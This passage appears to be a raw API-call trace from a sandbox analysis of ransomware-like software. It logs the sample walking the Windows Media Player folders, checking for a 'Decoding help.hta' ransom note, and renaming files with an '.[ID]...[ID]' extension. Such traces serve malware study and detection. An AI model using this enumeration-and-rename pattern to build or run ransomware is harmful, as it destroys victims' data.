lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.353] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmlaunch.exe.mui") returned -1 [0041.353] lstrlenW (lpString="wmlaunch.exe.mui") returned 16 [0041.353] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.353] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="wmlaunch.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" [0041.353] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" [0041.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.353] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMC.exe.mui", cAlternateFileName="")) returned 1 [0041.354] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMC.exe.mui") returned -1 [0041.354] lstrlenW (lpString="WMPDMC.exe.mui") returned 14 [0041.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="WMPDMC.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" [0041.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.354] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMCCore.dll.mui", cAlternateFileName="")) returned 1 [0041.354] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMCCore.dll.mui") returned -1 [0041.354] lstrlenW (lpString="WMPDMCCore.dll.mui") returned 18 [0041.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="WMPDMCCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" [0041.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" [0041.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.355] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmplayer.exe.mui", cAlternateFileName="")) returned 1 [0041.355] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.355] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmplayer.exe.mui") returned -1 [0041.355] lstrlenW (lpString="wmplayer.exe.mui") returned 16 [0041.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.355] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="wmplayer.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" [0041.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" [0041.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.355] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPMediaSharing.dll.mui", cAlternateFileName="")) returned 1 [0041.355] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.355] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPMediaSharing.dll.mui") returned -1 [0041.356] lstrlenW (lpString="WMPMediaSharing.dll.mui") returned 23 [0041.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.356] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="WMPMediaSharing.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" [0041.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" [0041.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.356] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssci.dll.mui", cAlternateFileName="")) returned 1 [0041.356] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.356] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.356] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssci.dll.mui") returned -1 [0041.356] lstrlenW (lpString="wmpnssci.dll.mui") returned 16 [0041.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.356] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="wmpnssci.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" [0041.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" [0041.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.356] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssui.dll.mui", cAlternateFileName="")) returned 1 [0041.357] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.357] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.357] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" [0041.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0041.357] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssui.dll.mui") returned -1 [0041.357] lstrlenW (lpString="wmpnssui.dll.mui") returned 16 [0041.357] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0041.357] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned 57 [0041.357] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\", lpString2="wmpnssui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" [0041.357] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" [0041.357] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.357] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xa3cfd30 | out: lpFindFileData=0xa3cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssui.dll.mui", cAlternateFileName="")) returned 0 [0041.357] FindClose (in: hFindFile=0x5d82d0 | out: hFindFile=0x5d82d0) returned 1 Thread: id = 275 os_tid = 0x9d8 [0040.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons\\*.*", lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8310 [0040.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.893] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.335] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.335] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 